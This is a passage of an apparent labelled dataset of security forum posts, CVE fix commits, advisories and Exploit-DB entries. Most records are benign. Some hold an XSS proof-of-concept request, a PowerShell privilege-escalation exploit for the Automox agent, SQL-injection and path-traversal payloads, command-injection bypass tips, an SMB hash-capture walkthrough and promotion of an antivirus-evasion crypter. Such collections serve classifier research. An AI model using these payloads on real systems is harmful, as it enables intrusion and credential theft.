"60b7cd7ca05b1d5a5d82", "text": "Well i found that %26%26 (&&) is not blocked but i can’t see the ls output. I am getting the “error while moving”, instead of the “malicious request”, i am injecting a command (l’s’) but no luck finding the ls command output. I used this:", "source": "hackthebox", "timestamp": "2022-08-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3a0a538be580864110ab", "text": "How to work with parrot security os?\n\nRecently I downloaded parrot os. Where I can find command list with all of parrot’s commands? How to hack someone, hack wifi, flash drive, charger or something what parrot can? What commands do I need for it? Submit videos or articles that can help me. plz", "source": "parrotsec", "timestamp": "2022-11-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "99f11b3a65c1e60ab2ec", "text": "CVE: CVE-2022-31029\n\n[{'lang': 'en', 'value': 'AdminLTE is a Pi-hole Dashboard for stats and configuration. In affected versions inserting code like `` in the field marked with \"Domain to look for\" and hitting enter (or clicking on any of the buttons) will execute the script. The user must be logged in to use this vulnerability. Usually only administrators have login access to pi-hole, minimizing the risks. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-cfr5-rqm5-9vhp\n\nFix/ghsa-cfr5-rqm5-9vhp - Possible XSS in queryads.php", "source": "cvefixes", "timestamp": "2022-07-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d6f9493f7aadf3761fd1", "text": "Moodle cross-site scripting (XSS) vulnerabilities\n\n[Severity: MEDIUM]\n\nMultiple cross-site scripting (XSS) vulnerabilities in Flowplayer Flash before 3.2.17, as used in Moodle through 2.3.11, 2.4.x before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2, allow remote attackers to inject arbitrary web script or HTML by (1) providing a crafted playerId or (2) referencing an external domain, a related issue to CVE-2013-7342.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "39615e78fa35ce4dfbe4", "text": "Warloxian: I only scanned with clamav, rkhunter. I don’t know what did you see, but let me tell you this: ClamAV is a static scanner. It’s totally based on signatures, no emulators no behavior scan, so the scan result is very limited. rkhunter or chrootkit don’t even use signature based detection. I’m not so sure about rkhunter, but chrootkit only uses file exists method most of time, so it has massive false positive and it can miss so many actual malwares in the system.", "source": "parrotsec", "timestamp": "2022-04-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3a5767d0c8f652475a83", "text": "Anytime I run into a problem on HTB, where I have the obvious answer and it doesn’t work, I log out of my account and log back in. Then retry the answer and it will work. They have a bug of some type. I am sure it can’t just be me. For a long time I thought I was loosing my mind. I would put the right answer in and it would say incorrect. After awhile I noticed if I came back the next day and put the exact same answer, it would accept it. I have tested this multiple times and found it to be a very consistent problem, this is my biggest ■■■■■ about HTB is this problem. Hope this helps", "source": "hackthebox", "timestamp": "2023-06-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "dd69382d650d7460c925", "text": "Although quotes are being escaped, it is still possible to exploit this kind of code if the input is not properly sanitized. Even if the quotes are being escaped, other characters such as semicolons, parentheses, and backticks can be used to inject malicious code. For example, an attacker could use the input ' OR 1=1;-- which would result in the following SQL query: Select * from table where name = '' OR 1=1;--' The double hyphen at the end of the query is used to comment out the remaining part of the original query, which prevents any syntax errors. Therefore, it is important to properly sanitize all user input, and to use prepared statements or parameterized queries instead of building SQL queries with user input. Regarding the vulnerability related to the GBK charset, it is specific to the way that character encoding is handled by MySQL. It is not related to WordPress or PHP. However, it is still important to properly sanitize all user input, regardless of the character encoding being used.", "source": "go4expert", "timestamp": "2023-04-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "21f7e594650e56f2a006", "text": "CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')\n\n# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')\n# Date: 2023/08/18\n# CVE: CVE-2023-38911\n# Exploit Author: Daniel González\n# Vendor Homepage: https://www.cszcms.com/\n# Software Link: https://github.com/cskaza/cszcms\n# Version: 1.3.0\n# Tested on: CSZ CMS 1.3.0\n# Description:\n# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the \"Name\" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the \"YouTube URL\" field within the created gallery.\n\n# Steps to reproduce Stored XSS:\n\nGo to url http://localhost/admin/plugin/gallery/edit/2.\n\nWhen logging into the panel, we will go to the \"Gallery\" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]\nWe edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.\n\nWith the following payload we can achieve the XSS\n\nPayload:\n\n

    \">\n\n\n#PoC Request:\n\nPOST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1\nHost: localhost:8080\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 140\nOrigin: http://localhost:8080\nReferer: http://localhost:8080/admin/plugin/gallery/edit/2\nUpgrade-Insecure-Requests: 1\n\ngallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add", "source": "exploitdb", "timestamp": "2023-09-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9eaeddfd8afac2ae7cf0", "text": "Rapunzel3000: within the >1000 lines HTTP-response, I would have never figured out any reaction to command injection attemps. I can give one more recommendation: Look for different ways to start a sub-shell, as neither && not || worked for me! got it!", "source": "hackthebox", "timestamp": "2022-01-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a2928745a067eaf6f3c0", "text": "CVE: CVE-2022-0939\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.'}]\n\nFix commit: Better epub cover parsing with multiple cover-image items\nCode cosmetics\nrenamed variables\nrefactored xml page generation\nrefactored prepare author", "source": "cvefixes", "timestamp": "2022-04-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ef801c70fe589ad5907e", "text": "I’ve never used it so can’t speak to its effectiveness, but scantool seems like the most straight forward tool for reading/clearing OBDII codes. Running the command scantool should open up a GUI.", "source": "parrotsec", "timestamp": "2023-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8e0423e9e24476931dc1", "text": "CVE: CVE-2022-1032\n\n[{'lang': 'en', 'value': 'Insecure deserialization of not validated module file in GitHub repository crater-invoice/crater prior to 6.0.6.'}]\n\nFix commit: Module upload validation (#857)\n\nhttps://huntr.dev/bounties/cb9a0393-be34-4021-a06c-00c7791c7622/", "source": "cvefixes", "timestamp": "2022-03-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "36c9de60c89adc889e0a", "text": "CVE: CVE-2022-24787\n\n[{'lang': 'en', 'value': 'Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. In version 0.3.1 and prior, bytestrings can have dirty bytes in them, resulting in the word-for-word comparisons giving incorrect results. Even without dirty nonzero bytes, two bytestrings can compare to equal if one ends with `\"\\\\x00\"` because there is no comparison of the length. A patch is available and expected to be part of the 0.3.2 release. There are currently no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-7vrm-3jc8-5wwm\n\n* add more tests for string comparison\n\nexplicitly test the codepath with <= 32 bytes\n\n* refactor keccak256 helper a bit\n\n* fix bytestring equality\n\nexisting bytestring equality checks do not check length equality or for\ndirty bytes.", "source": "cvefixes", "timestamp": "2022-04-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d727a9aba44374a674f4", "text": "CVE: CVE-2022-31564\n\n[{'lang': 'en', 'value': 'The woduq1414/munhak-moa repository before 2022-05-03 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.'}]\n\nFix commit: # Absolute Path Traversal due to incorrect use of `send_file` call\n\nA path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.\n\n## Common Weakness Enumeration category\nCWE - 36\n\n## Root Cause Analysis\n\nThe `os.path.join` call is unsafe for use with untrusted input. When the `os.path.join` call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below.\n```\n>>> import os.path\n>>> static = \"path/to/mySafeStaticDir\"\n>>> malicious = \"/../../../../../etc/passwd\"\n>>> os.path.join(t,malicious)\n'/../../../../../etc/passwd'\n```\nSince the \"malicious\" parameter represents an absolute path, the result of `os.path.join` ignores the static directory completely. Hence, untrusted input is passed via the `os.path.join` call to `flask.send_file` can lead to path traversal attacks.\n\nIn this case, the problems occurs due to the following code :\nhttps://github.com/woduq1414/munhak-moa/blob/cdcc98959879c2e88a89eea164e806b3b0e09972/app.py#L273\n\nHere, the `path` parameter is attacker controlled. This parameter passes through the unsafe `os.path.join` call making the effective directory and filename passed to the `send_file` call attacker controlled. This leads to a path traversal attack.\n\n## Proof of Concept\n\nThe bug can be verified using a proof of concept similar to the one shown below.\n\n```\ncurl --path-as-is 'http:///images//../../../../etc/passwd\"'\n```\n## Remediation\n\nThis can be fixed by preventing flow of untrusted data to the vulnerable `send_file` function. In case the application logic necessiates this behaviour, one can either use the `werkzeug.utils.safe_join` to join untrusted paths or replace `flask.send_file` calls with `flask.send_from_directory` calls.\n\n## Common Vulnerability Scoring System Vector\n\nThe attack can be carried over the network. A complex non-standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to affect a change on a system resource. Hence has limited to no impact on integrity. Using this attack vector a attacker may make multiple requests for accessing huge files such as a database. This can lead to a partial system denial service. However, the impact on availability is quite low in this case. Taking this account an appropriate CVSS v3.1 vector would be\n\n(AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L)[https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L&version=3.1]\n\nThis gives it a base score of 9.3/10 and a severity rating of critical.\n\n## References\n* [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n* github/securitylab#669\n\n### This bug was found using *[CodeQL by Github](https://codeql.github.com/)*", "source": "cvefixes", "timestamp": "2022-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "18eb2084d908106e0400", "text": "Automox Agent 32 - Local Privilege Escalation\n\n# Exploit Title: Automox Agent 32 - Local Privilege Escalation\n# Date: 13/12/2021\n# Exploit Author: Greg Foss\n# Writeup: https://www.lacework.com/blog/cve-2021-43326/\n# Vendor Homepage: https://www.automox.com/\n# Software Link: https://support.automox.com/help/agents\n# Version: 31, 32, 33\n# Tested on: Windows 10\n# Language: PowerShell\n# CVE: CVE-2021-43326\n\nNew-Item -ItemType Directory -Force -Path $HOME\\Desktop\\automox\\\n$payload = \"whoami >> $HOME\\Desktop\\automox\\who.txt\"\necho \"\"\necho \"Watching for Automox agent interaction...\"\necho \"\"\nfor (($i = 0); $i -lt 500; $i++) {\n if (Test-Path -Path \\ProgramData\\amagent\\execDir*\\*.ps1) {\n try {\n $dir = Get-ChildItem \\ProgramData\\amagent\\execDir* | Select-Object Name\n $dir = $dir.name\n $file = Get-ChildItem \\ProgramData\\amagent\\$dir\\*.ps1 | Select-Object Name\n $file = $file.name\n (Get-Content -Path \\ProgramData\\amagent\\$dir\\$file -Raw) -replace \"#endregion\", \"$payload\" | Set-Content -Path \\ProgramData\\amagent\\$dir\\$file\n cp -r \\ProgramData\\amagent\\$dir $HOME\\Desktop\\automox\\\n echo 'popped :-)'\n Start-Sleep 5\n echo ''\n echo 'cloning all powershell script content...'\n for (($i = 0); $i -lt 100; $i++) {\n cp -r \\ProgramData\\amagent\\* $HOME\\Desktop\\automox\\ -Force\n Start-Sleep 1\n }\n exit\n } catch {\n throw $_.Exception.Message\n }\n } else {\n echo $i\n Start-Sleep 1\n }\n}", "source": "exploitdb", "timestamp": "2022-01-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "42ea22903b12b5e2a745", "text": "Everytime i’m looking for clues i always see you invested here helping people. Thanks a lot man!", "source": "hackthebox", "timestamp": "2023-09-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6dd0c4b8a598792a4276", "text": "Here is the original syntax from HTB on the “find files and directories” page. find / -type f -name *.conf -user root -size +20k -newermt 2020-03-03 -exec ls -al {} \\; 2>/dev/null So start breaking it down. Do you need a -user since you are already logged in? no. Scratch that. Now we have this. find / -type f -name *.conf -size +20k -newermt 2020-03-03 -exec ls -al {} \\; 2>/dev/null Does the question ask for size of the files? No. Scratch that and now we have this. find / -type f -name *.conf -newermt 2020-03-03 -exec ls -al {} \\; 2>/dev/null Does the question ask for a date for the file? No. Scratch that. And now we have this. find / -type f -name *.conf -exec ls -al {} \\; 2>/dev/null Does the question ask for a .conf file? No it asks for a log file. Scratch and edit. And now we have this. find / -type f -name *.log -exec ls -al {} \\; 2>/dev/null I did not get a number to count. But I do know how to add the results. Or, be goofy and copy and paste into excel to get your number. I did notice that a lot of comments had things like \"\" in their syntax and added a few flags outside of the original syntax. Although its awesome to be creative and in fact some of those syntax add-ons may work elsewhere, just remember that HTB is not trying to throw you for a loop. If its not in the Modules then it probably wont work. Stick to whats being taught. If it aint broke, dont fix it. **ring ring** Call Center: Call cneter to fix all your computer needs, may I help you? Caller: My computer isnt working. Help! Call Center: is it plugged in? Sometimes the simplest things work best. Use the KISS method. Keep It Simple Stupid Happy Hunting.", "source": "hackthebox", "timestamp": "2022-05-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3a6aaddb0ef144c536fe", "text": "Jason: been using various Linux distros for 12 years or so. Hi @Jason (Pastor) The easiest way to go is to get a CompTIA A+ certification and work either via phone (tech support/help desk) or on location (IT technician). The tech support positions are either in a call center or work at home via phone. Then you can study to get other certifications (like the CompTIA Network+, CompTIA Linux+, Cisco CCNA, etc.) to move up and get better pay. I think the A+ is being updated soon to a new version, which CompTIA does every 3 years. Here’s the guy who helped me get my A+ back in 2010 and Network+ in 2012. Free video courses on YouTube with monthly live study sessions.", "source": "parrotsec", "timestamp": "2022-09-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2aae013f8979878b6203", "text": "Relwarc17: https://www.hackthebox.eu/home/users/profile/42767 I didn’t know the path to my profile (when i opened profile the path didn’t show up in the URL bar, i knew only my number) Thank you, i gave you respect for this.", "source": "hackthebox", "timestamp": "2022-04-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7a45bf71e3be16d0ff6b", "text": "Feel free to DM me at anytime. I am East Coast US. so keep that in mind. It sounds like you are there, have you tried getting the flag to display in that error message? Or maybe copying? If you are using mv maybe it will not work. If you are still having trouble, just DM me with a screenshot, or the line of code you are using on the target server. -onthesauce", "source": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "204800e2e9fa243f8d61", "text": "Hello, 1.) Regarding the penultimate question: Name is Harry Potter. Generate a Username List (Username Generator) and a Pass List with CUPP (see Akiraowen’s post above!), RegEx it and that should work. 2.) However for the very last question: There is a second (SSH-) user account, G.Potter. We are supposed to brute force on the victim machine using the provided RockYou-30 wordlist. This won’t work and I have no idea what else could be tried.", "source": "hackthebox", "timestamp": "2022-01-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2716b21bfe1cf912872b", "text": "Please for the love of god help me before i loose my mind. got up to the last assesment no problem and have been on this for a week!!!", "source": "hackthebox", "timestamp": "2022-01-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e9ff8e9cf6e93eeeec2d", "text": "Thank you. Have you any guidance as to how to learn more about this subject? As far as tools go it seems as if it is one of the harder ones to learn anything about. You can do a web search on metasploit for example and find a thousand ways to exploit a windows xp and if lucky a little more, but leaning about how to exploit a car seems a subject rarely shared.", "source": "parrotsec", "timestamp": "2023-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3119e9a1ea9bcdf301a7", "text": "CVE: CVE-2022-25352\n\n[{'lang': 'en', 'value': 'The package libnested before 1.5.2 are vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930)'}]\n\nFix commit: better fix for prototype pollution vulnerability\n\ncheers Idan Digmi of Snyk Security", "source": "cvefixes", "timestamp": "2022-03-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "87d1db968b7f8e4e1871", "text": "Hi. Are we talking about your router, right? You should find the gateway to access it via your browser. This thread is not about Parrot.", "source": "parrotsec", "timestamp": "2022-03-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7efc0bf0fb5c358a8fbd", "text": "CVE: CVE-2022-34835\n\n[{'lang': 'en', 'value': 'In Das U-Boot through 2022.07-rc5, an integer signedness error and resultant stack-based buffer overflow in the \"i2c md\" command enables the corruption of the return address pointer of the do_i2c_md function.'}]\n\nFix commit: i2c: fix stack buffer overflow vulnerability in i2c md command\n\nWhen running \"i2c md 0 0 80000100\", the function do_i2c_md parses the\nlength into an unsigned int variable named length. The value is then\nmoved to a signed variable:\n\n int nbytes = length;\n #define DISP_LINE_LEN 16\n int linebytes = (nbytes > DISP_LINE_LEN) ? DISP_LINE_LEN : nbytes;\n ret = dm_i2c_read(dev, addr, linebuf, linebytes);\n\nOn systems where integers are 32 bits wide, 0x80000100 is a negative\nvalue to \"nbytes > DISP_LINE_LEN\" is false and linebytes gets assigned\n0x80000100 instead of 16.\n\nThe consequence is that the function which reads from the i2c device\n(dm_i2c_read or i2c_read) is called with a 16-byte stack buffer to fill\nbut with a size parameter which is too large. In some cases, this could\ntrigger a crash. But with some i2c drivers, such as drivers/i2c/nx_i2c.c\n(used with \"nexell,s5pxx18-i2c\" bus), the size is actually truncated to\na 16-bit integer. This is because function i2c_transfer expects an\nunsigned short length. In such a case, an attacker who can control the\nresponse of an i2c device can overwrite the return address of a function\nand execute arbitrary code through Return-Oriented Programming.\n\nFix this issue by using unsigned integers types in do_i2c_md. While at\nit, make also alen unsigned, as signed sizes can cause vulnerabilities\nwhen people forgot to check that they can be negative.\n\nSigned-off-by: Nicolas Iooss \nReviewed-by: Heiko Schocher ", "source": "cvefixes", "timestamp": "2022-06-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "607b6720488ab3812f2b", "text": "You can get the seclists from the github repo; GitHub GitHub - danielmiessler/SecLists: SecLists is the security tester's... SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, ... and you just need to unpack it to; /usr/share/seclists", "source": "parrotsec", "timestamp": "2023-04-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8f270e545c0be1819b6f", "text": "CVE: CVE-2022-0401\n\n[{'lang': 'en', 'value': 'Path Traversal in NPM w-zip prior to 1.0.12.'}]\n\nFix commit: fix: change output to filename for Disclosure/DoS/RCE", "source": "cvefixes", "timestamp": "2022-02-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "31e44b122d1c2e694904", "text": "The best is the official one and by Google. Here are links to them https://docs.python.org/3/tutorial/ https://developers.google.com/edu/python", "source": "go4expert", "timestamp": "2023-03-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5c2422564a32fbb5c6bd", "text": "CVE: CVE-2022-24950\n\n[{'lang': 'en', 'value': \"A race condition exists in Eternal Terminal prior to version 6.2.0 that allows an authenticated attacker to hijack other users' SSH authorization socket, enabling the attacker to login to other systems as the targeted users. The bug is in UserTerminalRouter::getInfoForId().\"}]\n\nFix commit: red fixes (#468)\n\n* red fixes\r\n\r\n* remove magic number", "source": "cvefixes", "timestamp": "2022-08-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "553332111e6accce3804", "text": "Was stuck at this for quite some time - for anyone struggling, here is (roughly) how the process of solving this one goes: Make a list of all operations you have access to - e.g search, copy, move Check which ones make network requests - this should only leave you with 2 requests to focus on . Check which parameters they have - from, to, finish etc. Don’t focus on any specific one of these parameters, I wasted quite some time on one, only to solve it with another. After you’ve decided which parameter to start testing with, you need the following - a way to start a subshell ( &&, || or ; ) and a goal (do you want to move the flag to a directory and read it, do you want to cat it’s contents? If catting - what output to - the page, or an error message?). After you’ve thought about this, craft different payloads to test. Will you obfuscate your command through base64? Or inserting quote marks between some characters? Try different things. Remember that some characters are blacklisted, so you will have to substitute them using PATH or something else, as other posters have said before. It was quite the frustrating exercise - I was super close from the get-go, but the errors threw me off and I wasted a lot of time afterwards crafting other payloads & trying commix (an automated tool for OS command injection detection ). Hope this helps someone - if you’re still stuck DM me and I might be able to give you a better nudge.", "source": "hackthebox", "timestamp": "2023-01-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fe0362c144298cf70e8c", "text": "CVE: CVE-2021-3715\n\n[{'lang': 'en', 'value': 'A flaw was found in the \"Routing decision\" classifier in the Linux kernel\\'s Traffic Control networking subsystem in the way it handled changing of classification filters, leading to a use-after-free condition. This flaw allows unprivileged local users to escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.'}]\n\nFix commit: net_sched: cls_route: remove the right filter from hashtable\n\nroute4_change() allocates a new filter and copies values from\nthe old one. After the new filter is inserted into the hash\ntable, the old filter should be removed and freed, as the final\nstep of the update.\n\nHowever, the current code mistakenly removes the new one. This\nlooks apparently wrong to me, and it causes double \"free\" and\nuse-after-free too, as reported by syzbot.\n\nReported-and-tested-by: syzbot+f9b32aaacd60305d9687@syzkaller.appspotmail.com\nReported-and-tested-by: syzbot+2f8c233f131943d6056d@syzkaller.appspotmail.com\nReported-and-tested-by: syzbot+9c2df9fd5e9445b74e01@syzkaller.appspotmail.com\nFixes: 1109c00547fc (\"net: sched: RCU cls_route\")\nCc: Jamal Hadi Salim \nCc: Jiri Pirko \nCc: John Fastabend \nSigned-off-by: Cong Wang \nSigned-off-by: David S. Miller ", "source": "cvefixes", "timestamp": "2022-03-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9cd32cff4741cb275264", "text": "CVE: CVE-2022-24869\n\n[{'lang': 'en', 'value': \"GLPI is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing. In versions prior to 10.0.0 one can use ticket's followups or setup login messages with a stylesheet link. This may allow for a cross site scripting attack vector. This issue is partially mitigated by cors security of browsers, though users are still advised to upgrade.\"}]\n\nFix commit: Merge pull request from GHSA-p94c-8qp5-gfpx", "source": "cvefixes", "timestamp": "2022-04-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a2999e9311c899957e36", "text": "For anyone else who may be stuck troubleshooting. Here are some options to try, I was stuck too. Read through all 3, you may have missed one. A (yes I had to append one haha). If you put in the ip address into the browser and it wont let you see the unika.htb, you need to resolv the /etc/hosts file for the DNS server because the server is a server running HTB VM boxes, and they all share the same outgoing IP, so the domain name doesn’t know what ip to attach to. go into > cd /etc/hosts and add the ‘IPADDRESS (tab space) unika.htb’, aparently you will have to do this over and over for htb boxes when its a web server to view the page for more enumeration…I just wanted to use the word enumeration to sound smart. 1 Make sure the interface you use when you start Responder is the interface that is connected to the HTB box. For me it was openvpn, so tun0. 2 Also make sure you are connected to the HTB box in the same environment you are running Responder, I was using tools in my Kali VM, but running the openvpn connection on my mac, so couldn’t read the traffic. 3 Once responder is up and running properly ‘python3 Responder.py -I tun0’, then make sure when you enter the web browser address to add smb payload ‘ http://unika.htb/?page=//ipaddress/whatever ’, the IPADDRESS is NOT the Responder HTB server you used to nmap earlier, its the ipaddress connected to our openvpn connection!. You can check this with ifconfig in kali or linux, and see what tun0 ip is or JUST GO into the running responder listening and look at the responder IP address after the responder NIC line of code…make sure you use that in the web address attack with page= :). Hope this helps.", "source": "hackthebox", "timestamp": "2023-12-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0652f4a563eb5a377c08", "text": "AntiVirus Evasion With Exocet\n\nHello, I have tried many tools and tried ways to generate an undetectable payload but none of them worked. Now I came across this tool and today I was able to bypass Windows Defender successfully. That’s why I want to share this with you on this forum. And I hope you will have as much success as me. Have fun! AntiVirus Evasion With Exocet Hello aspiring Ethical Hackers. In this article, you will learn about AntiVirus Evasion with the help of a tool named Exocet. Exocet is a Crypter type malware dropper. A Crypter is a software that is used to make malware undetectable. It performs functions such as encrypting, obfuscating and manipulating the code of the malware to make it undetectable. Hackercool Magazine – 20 Mar 22 AntiVirus Evasion With Exocet - Hackercool Magazine Exocet is a Crypter Malware Dropper that generates undetectable payloads for Windows. AntiVirus Evasion is Estimated reading time: 5 minutes Vulners Database – 15 Nov 21 EXOCET - AV-evading, Undetectable, Payload Delivery Tool EXOCET is superior to Metasploit's \"Evasive Payloads\" modules as EXOCET uses AES-256 in GCM Mode (Galois/Counter Mode). Metasploit's Evasion Payloads uses a easy to detect RC4 encryption. While RC4 can decrypt faster, AES-256 is much more difficult... GitHub GitHub - tanc7/EXOCET-AV-Evasion: EXOCET - AV-evading, undetectable, payload... EXOCET - AV-evading, undetectable, payload delivery tool - GitHub - tanc7/EXOCET-AV-Evasion: EXOCET - AV-evading, undetectable, payload delivery tool", "source": "hackersploit", "timestamp": "2022-03-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "753825eab5f0550b479e", "text": "denpakei: OST2 is related somehow to Parrot OS? or it’s just learning source you recommend? OST2 has nothing to do with Parrot OS. It is 1 of best free learning courses out there", "source": "parrotsec", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ce5c881d9112f554f6f2", "text": "I am looking for people who can hide their ass and work with them. I see beautiful ideas here. Good learning from you guys. Always buy used devices. Trust me it helps. Always use an RDP regardless your layers of protection.", "source": "hackersploit", "timestamp": "2022-07-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "964acfe562ac61ff4076", "text": "CVE: CVE-2022-31133\n\n[{'lang': 'en', 'value': 'HumHub is an Open Source Enterprise Social Network. Affected versions of HumHub are vulnerable to a stored Cross-Site Scripting (XSS) vulnerability. For exploitation, the attacker would need a permission to administer the Spaces feature. The names of individual \"spaces\" are not properly escaped and so an attacker with sufficient privilege could insert malicious javascript into a space name and exploit system users who visit that space. It is recommended that the HumHub is upgraded to 1.11.4, 1.10.5. There are no known workarounds for this issue.'}]\n\nFix commit: Fix format of displaying user profile title field on \"People\" page (#5797)", "source": "cvefixes", "timestamp": "2022-07-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1993d40b69b26f897eaf", "text": "Wow, ive been stuck on this forever. Seriously wtf why would it specifically say to log into no machine ans then ask a question completely unrelated?!", "source": "hackthebox", "timestamp": "2022-08-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1e014150ebdeff1a7740", "text": "Thanks mate, this was very unintuitive i dont want to have to click “Hint”", "source": "hackthebox", "timestamp": "2023-08-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0af3d242d1fce38b476a", "text": "CVE: CVE-2022-35923\n\n[{'lang': 'en', 'value': \"v8n is a javascript validation library. Versions of v8n prior to 1.5.1 were found to have an inefficient regular expression complexity in the `lowercase()` and `uppercase()` regex which could lead to a denial of service attack. In testing of the `lowercase()` function a payload of 'a' + 'a'.repeat(i) + 'A' with 32 leading characters took 29443 ms to execute. The same issue happens with uppercase(). Users are advised to upgrade. There are no known workarounds for this issue.\"}]\n\nFix commit: fix inefficient regular expressions on lowercase and uppercase rules", "source": "cvefixes", "timestamp": "2022-08-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "df9c1f90d9746165bf9d", "text": "HTB gives us enough to overcome the module, and well, seeing that they have already provided the answer above, I feel free to express how I solved it. So, HTB gives us the following subdomain: www.inlanefreight.htb . The first thing we would need to do is enumerate the domain inlanefreight.htb: curl -s inlanefreight.htb With this, we obtain the first flag. There is another way to obtain this flag and the following ones. If we interact by fuzzing the vhosts, we find that it gives us a status code of 200. Even when trying with vhosts that would be very unlikely to exist, such as ffmeshfetGFG.inlanefreight.htb, it still returns 200. One thing I noticed is that the “Content-Length” for non-existent Vhosts is always 10918. Using ffuf with this information, the command looks like this: ffuf -w ./vhost -H \"Host: FUZZ.inlanefreight.htb\" -u http://10.129.136.58 -fs 10918 With a bit of patience, we will apply a curl to each discovered VHOST, obtaining the flag.", "source": "hackthebox", "timestamp": "2023-12-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bdf950c81614147ae02f", "text": "Snappy PHAR deserialization vulnerability\n\n[Severity: CRITICAL]\n\n## Issue\n\nOn March 17th the 